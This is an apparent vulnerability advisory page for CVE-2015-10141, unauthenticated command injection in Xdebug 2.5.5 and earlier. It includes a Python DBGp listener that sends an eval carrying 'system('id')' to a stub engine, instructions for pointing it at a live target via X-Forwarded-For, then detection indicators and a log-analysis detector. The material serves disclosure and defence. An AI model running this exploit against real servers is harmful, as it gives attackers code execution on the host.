CVE-2015-10141
published 2025-07-23


Priority P1 (81) · critical · 9.3 CVSS 4.0
Exploit: public (Metasploit module available)
EPSS: 5.03% (91.2 percentile)
An unauthenticated OS command injection vulnerability exists in Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans. With remote debugging enabled (xdebug.remote_enable=1), Xdebug acts as a DBGp client: when a request carries XDEBUG_SESSION_START or the XDEBUG_SESSION cookie, it opens a TCP connection to the debugger on xdebug.remote_port (default 9000), and with xdebug.remote_connect_back=1 it takes the debugger address from the request itself, consulting X-Forwarded-For before REMOTE_ADDR. The DBGp session carries no authentication, so whoever receives that connection can send a crafted eval command whose base64 payload is arbitrary PHP, which may invoke system-level functions such as system() or passthru(). This results in full compromise of the host under the privileges of the web server user.
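The exchange described above, as an added example that is not part of this advisory or of Xdebug's own code: a Python listener plays the attacker's side of the DBGp session, reads Xdebug's length-prefixed init packet and sends the unauthenticated eval command with its base64-encoded PHP. The engine side is a constructed stand-in driven over a socketpair so the script runs offline; the file URI, appid and the stub response it sends are assumptions, and real Xdebug would execute the decoded PHP instead of just recording it.

```python
import base64
import socket
import threading
from typing import Optional

# DBGp framing as Xdebug speaks it to the debugger it connects to:
#   engine -> IDE packets:  "<decimal length>" NUL "<xml>" NUL
#   IDE -> engine commands: "<name> -i <tid> [-k v ...] [-- base64data]" NUL


def frame_packet(xml: bytes) -> bytes:
    """Frame one engine->IDE packet (the <init> and <response> messages)."""
    return str(len(xml)).encode() + b"\x00" + xml + b"\x00"


def read_packet(sock: socket.socket) -> bytes:
    """Read one length-prefixed packet from the engine side of the session."""
    length = b""
    while (ch := sock.recv(1)) != b"\x00":
        if not ch:
            raise ConnectionError("engine closed the connection mid-header")
        length += ch
    want = int(length)
    payload = b""
    while len(payload) < want:
        chunk = sock.recv(want - len(payload))
        if not chunk:
            raise ConnectionError("short DBGp packet")
        payload += chunk
    if sock.recv(1) != b"\x00":
        raise ValueError("DBGp packet missing its trailing NUL")
    return payload


def build_command(name: str, tid: int, data: Optional[str] = None, **args: str) -> bytes:
    """Build an IDE->engine command; eval carries its PHP expression in the base64 tail."""
    parts = [name, "-i", str(tid)]
    for key, value in args.items():
        parts += [f"-{key}", str(value)]
    if data is not None:
        parts += ["--", base64.b64encode(data.encode()).decode()]
    return " ".join(parts).encode() + b"\x00"


def parse_command(raw: bytes) -> dict:
    """Decode an IDE->engine command the way the engine must (used by the stub engine)."""
    text = raw.rstrip(b"\x00").decode()
    head, _, b64 = text.partition(" -- ")
    tokens = head.split()
    args = {tokens[i][1:]: tokens[i + 1] for i in range(1, len(tokens) - 1, 2)}
    return {"name": tokens[0], "tid": args.get("i"), "args": args,
            "data": base64.b64decode(b64).decode() if b64 else None}


def fake_xdebug_engine(sock: socket.socket, idekey: str, seen: list) -> None:
    """Constructed stand-in for Xdebug's side: announce with <init>, answer one command.
    Real Xdebug would run the decoded PHP; this stub only records it in `seen`."""
    sock.sendall(frame_packet(
        b'<?xml version="1.0" encoding="iso-8859-1"?>'
        b'<init xmlns="urn:debugger_protocol_v1" fileuri="file:///var/www/html/index.php" '
        b'language="PHP" protocol_version="1.0" appid="4242" idekey="' + idekey.encode() + b'"/>'))
    raw = b""
    while not raw.endswith(b"\x00"):
        chunk = sock.recv(1)
        if not chunk:
            return
        raw += chunk
    cmd = parse_command(raw)
    seen.append(cmd)
    status = b"ok" if cmd["name"] == "eval" else b"unsupported"  # stub attribute, not DBGp spec
    sock.sendall(frame_packet(
        b'<response xmlns="urn:debugger_protocol_v1" command="' + cmd["name"].encode()
        + b'" transaction_id="' + (cmd["tid"] or "0").encode() + b'" status="' + status + b'"/>'))
    sock.close()


def run_session(php: str, idekey: str = "XDEBUG_ECLIPSE") -> dict:
    """Play the attacker's listener against the stub engine over a socketpair."""
    ide, engine = socket.socketpair()
    seen: list = []
    worker = threading.Thread(target=fake_xdebug_engine, args=(engine, idekey, seen))
    worker.start()
    init = read_packet(ide)                            # engine speaks first
    ide.sendall(build_command("eval", 1, data=php))    # no authentication step in between
    response = read_packet(ide)
    worker.join()
    ide.close()
    return {"init": init.decode(), "engine_ran": seen[0]["data"], "response": response.decode()}


if __name__ == "__main__":
    result = run_session("system('id');")
    print(result["init"])
    print("engine would execute:", result["engine_ran"])
    print(result["response"])
```

Against a live target the only difference is that the listener binds port 9000 and waits for Xdebug to connect after an XDEBUG_SESSION_START request is sent with X-Forwarded-For pointing at the listener; everything after the accept is the same two packets.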

Affected

2 ranges:

Vendor   Product   Version range   Fixed in
debian   xdebug
xdebug   xdebug    <= 2.5.5

Detection & IOCs (extracted from sources)

port:    9000
cookie:  XDEBUG_SESSION
url:     /?XDEBUG_SESSION_START={{randstr}}
command: eval
  • Monitor for TCP connections on port 9000 between web servers and external/untrusted hosts. In the connect-back flow this exploit uses, the web server opens the connection outbound to the attacker's DBGp listener, so egress from the web tier to port 9000 is the stronger signal.
  • Detect HTTP requests containing the query parameter XDEBUG_SESSION_START, which initiates an Xdebug remote debugging session and is the first step of exploitation.
  • Detect HTTP responses setting the XDEBUG_SESSION cookie, confirming the target has Xdebug remote debugging enabled and is susceptible to exploitation.
  • Alert on an X-Forwarded-For header carrying an attacker-controlled callback address in conjunction with XDEBUG_SESSION_START requests, as this is what redirects the debugger connection to the attacker when xdebug.remote_connect_back is on.
  • Look for debugger protocol eval commands on the port 9000 session that invoke PHP system-level functions, indicating active code execution attempts.
  • Use the Metasploit module unix/http/xdebug_unauth_exec to validate exposure; its signatures in logs or IDS alerts can indicate active exploitation attempts.
  • Exploitation requires Xdebug remote debugging to be explicitly enabled; this is not a default configuration in production environments.
  • All Red Hat offerings ship fixed or unaffected versions of Xdebug and do not enable remote debugging by default, reducing real-world risk in those environments.
  • Debian distributions (bookworm, bullseye, forky, sid, trixie) remain open/unpatched for this CVE as of the tracker data; deployments on these distros should be treated as potentially vulnerable if Xdebug <= 2.5.5 is installed.
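The detection bullets above turned into code, as an added example not taken from any of the cited sources: it runs over constructed access-log and connection-log lines in made-up formats (not a standard web-server or netflow format), treats the X-Forwarded-For value, or the client address when that header is absent, as the connect-back target the way xdebug.remote_connect_back selects it, and escalates when that target, or the destination of a port-9000 connection from the web tier, falls outside an assumed trusted address list (TRUSTED_NETS).

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumed trusted address space for the web tier; adjust to the environment.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
XDEBUG_PORT = 9000

# Constructed log formats (not a standard web-server or netflow format):
#   access: <client_ip> "<METHOD> <uri> <proto>" <status> xff=<X-Forwarded-For or ->
#   conn:   <src_ip>:<sport> -> <dst_ip>:<dport>
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>\S+) (?P<uri>\S+) (?P<proto>\S+)" (?P<status>\d{3}) xff=(?P<xff>\S+)$')
CONN_RE = re.compile(r'^(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$')


def is_trusted(addr: str) -> bool:
    """True for addresses inside TRUSTED_NETS. Non-IP strings count as untrusted;
    connect-back can only dial an address, so a hostname here is itself suspicious."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_NETS)


def analyze_access_log(lines):
    """Flag XDEBUG_SESSION_START requests and rate them by where Xdebug would call back:
    X-Forwarded-For if present, otherwise the client address (REMOTE_ADDR)."""
    alerts = []
    for line in lines:
        m = ACCESS_RE.match(line.strip())
        if not m:
            continue
        qs = parse_qs(urlsplit(m["uri"]).query, keep_blank_values=True)
        if "XDEBUG_SESSION_START" not in qs:
            continue
        via = "X-Forwarded-For" if m["xff"] != "-" else "REMOTE_ADDR"
        callback = m["xff"] if via == "X-Forwarded-For" else m["client"]
        untrusted = not is_trusted(callback)
        alerts.append({
            "severity": "high" if untrusted else "medium",
            "client": m["client"],
            "idekey": qs["XDEBUG_SESSION_START"][0],
            "callback": callback,
            "via": via,
            "reason": ("XDEBUG_SESSION_START with untrusted connect-back target"
                       if untrusted else "XDEBUG_SESSION_START from trusted address space"),
        })
    return alerts


def analyze_connections(lines):
    """Flag connections from the web tier to port 9000 on untrusted hosts: the DBGp
    callback itself rather than the HTTP trigger."""
    alerts = []
    for line in lines:
        m = CONN_RE.match(line.strip())
        if not m or int(m["dport"]) != XDEBUG_PORT or is_trusted(m["dst"]):
            continue
        alerts.append({"severity": "high", "src": m["src"], "dst": m["dst"],
                       "reason": "DBGp callback to untrusted host on port 9000"})
    return alerts


# Constructed sample records for a stand-alone run.
SAMPLE_ACCESS = [
    '203.0.113.7 "GET /index.php HTTP/1.1" 200 xff=-',
    '203.0.113.7 "GET /?XDEBUG_SESSION_START=Kx9vQ2 HTTP/1.1" 200 xff=-',
    '203.0.113.7 "GET /?XDEBUG_SESSION_START=Kx9vQ2 HTTP/1.1" 200 xff=198.51.100.9',
    '10.20.30.40 "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 xff=10.20.30.40',
]
SAMPLE_CONNS = [
    "10.0.0.5:51022 -> 10.0.0.9:9000",
    "10.0.0.5:51023 -> 198.51.100.9:9000",
    "10.0.0.5:51024 -> 198.51.100.9:443",
]

if __name__ == "__main__":
    for alert in analyze_access_log(SAMPLE_ACCESS) + analyze_connections(SAMPLE_CONNS):
        print(alert)
```

The two analyzers are meant to be correlated: a high-severity access alert followed by a port-9000 connection from the same web server to the same callback address is the full exploitation chain, whereas a session-start request whose callback stays inside the trusted nets is usually a developer with a misconfigured IDE.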

CVSS provenance

nvd            v4.0   9.3   CRITICAL   CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
osv                   9.3   CRITICAL
vendor_debian         9.3   LOW
vendor_redhat         9.3   CRITICAL